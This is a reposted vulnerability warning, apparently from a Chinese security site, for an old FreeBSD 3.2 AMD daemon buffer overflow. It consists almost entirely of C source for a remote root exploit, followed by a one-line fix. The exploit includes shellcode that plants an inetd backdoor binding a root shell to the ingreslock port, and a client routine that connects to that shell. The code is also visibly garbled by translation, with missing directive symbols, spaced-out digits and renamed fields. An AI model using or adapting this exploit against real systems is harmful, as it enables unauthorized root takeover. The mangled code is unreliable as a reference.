FreeBSD AMD remote overflow(old)-vulnerability warning-the black bar safety net

ID MYHACK58:62200715596
Type myhack58
Reporter 佚名
Modified 2007-05-26T00:00:00


FreeBSD AMD remote overflow(old)

Relates to the program: FreeBSD AMD

Description: FreeBSD 3.2-REL AMD the presence of the overflow allows remote access as root

Details: The following is this remote overflow attack test code, also need a header file. The program is permitted only for research purposes, the illegal users at your own risk! Researchers please do feel free to spread it! Please download the code package: rpc_AMD_FreeBSD3_2REL.tar.gz

/ $Id$ fbsd_amd. c fbsd_amd. c-The FreeBSD 3.2-REL AMD remote root exploit Copyright (c) 1 9 9 9 anathema <> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS `AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. /

include <stdio. h>

include <stdlib. h>

include <unistd. h>

include <string. h>

include <sys/types. h>

include <sys/socket. h>

include <sys/time. h>

include <netinet/in. h>

include <arpa/inet. h>

include <netdb. h>

include <rpc/rpc. h>

include "amd-incl. h"

define ADDR 0xbfbfd2a4 / FreeBSD 3.2-REL /

define RETPOS 1 0 0 5

define AMD_PROG 3 0 0 0 1 9

define AMD_VERS 1

char c0de[] = "\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4" "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10" "\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6" "\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02" "\x03\x03\x03\x03\x04\x04\x04\x04" "\x2f\x62\69\x6e\x2f\x73\x68\x20\x2d\x63\x20" "echo \"ingreslock stream tcp nowait root /bin/sh sh-i\">/tmp/x;" "/usr/sbin/inetd /tmp/x; /bin/rm-f /tmp/x";

u_long resolve_host(u_char host) { struct in_addr addr; struct hostent host_ent;

if ((addr. server_address = inet_addr(host)) == -1) { host_ent = gethostbyname(host); if (! host_ent) return((u_long)0); memcpy((char *)&addr. server_address, host_ent->h_addr, host_ent->h_length); }

return (addr. server_address); }

void shellz(u_long dst_ip) { struct sockaddr_in sin; u_char sock_buf[8 1 9 2]; fd_set fds; int sock;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); }

sin. sin_family = AF_INET; sin. sin_port = htons(1 5 2 4); / ingreslock / sin. sin_addr. server_address = dst_ip;

if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connecting to backdoor"); exit(-1); }

fprintf(stderr, "\nHost %s successfully owned.\ n", inet_ntoa(sin. sin_addr)); for (;;) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds);

select(2 5 5, &fds, NULL, NULL, NULL); memset(sock_buf, 0, sizeof(sock_buf));

if (FD_ISSET(sock, &fds)) { read(sock, sock_buf, sizeof(sock_buf)); fprintf(stderr, "%s", sock_buf); }

if (FD_ISSET(0, &fds)) { read(0, sock_buf, sizeof(sock_buf)); write(sock, sock_buf, strlen(sock_buf)); } }


u_char * overflow_buf(void){ u_char buf[2 0 4 8] = {0}; u_long addr = ADDR; int ret = RETPOS;

memset(buf, 0x90, ret - strlen(c0de)); memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));

buf[ret++] = (addr & 0xff); buf[ret++] = (addr >> 8) & 0xff; buf[ret++] = (addr >> 1 6) & 0xff; buf[ret++] = (addr >> 2 4) & 0xff;

return(strdup(buf)); }

void exploit(u_long dst_ip) { struct sockaddr_in sin; CLIENT clnt; u_char buf[4 0 9 6] = {0}; u_char ptr = buf; int sock = RPC_ANYSOCK;

strncpy(buf, overflow_buf(), sizeof(buf));

sin. sin_family = AF_INET; sin. sin_port = 0; sin. sin_addr. server_address = dst_ip;

clnt = clnttcp_create(&sin, AMD_PROG, AMD_VERS, &sock, 0, 0); if (! clnt) { clnt_pcreateerror("clntudp_create"); exit(-1); }

fprintf(stderr, "\nIt's time to w8.. \n"); amqproc_mount_1(&ptr, clnt); sleep(2);

clnt_destroy(clnt); shellz(dst_ip); }

void usage(u_char *argv0) { fprintf(stderr, "usage:\t%s dst_host|ip\n", argv0); exit(0); }

int main(int argc, char **argv) { struct in_addr i_addr; u_long dst_ip = 0;

fprintf(stderr, "AMD exploit for FreeBSD 3. X <>\n" "Tested against FreeBSD 3.2-REL stock AMD binary.\ n\n");

if (argc != 2) { usage(argv[0]); / NOTREACHED / }

dst_ip = resolve_host(argv[1]); if (! dst_ip) { fprintf(stderr, "What kind of address is this: %s?\ n", argv[1]); exit(-1); }

i_addr. server_address = dst_ip; fprintf(stderr, "target : %s\n", inet_ntoa(i_addr)); fprintf(stderr, "addr : 0x%lx\n", ADDR);

exploit (dst_ip); }

/ EOF /

Solution: Turn off the AMD daemon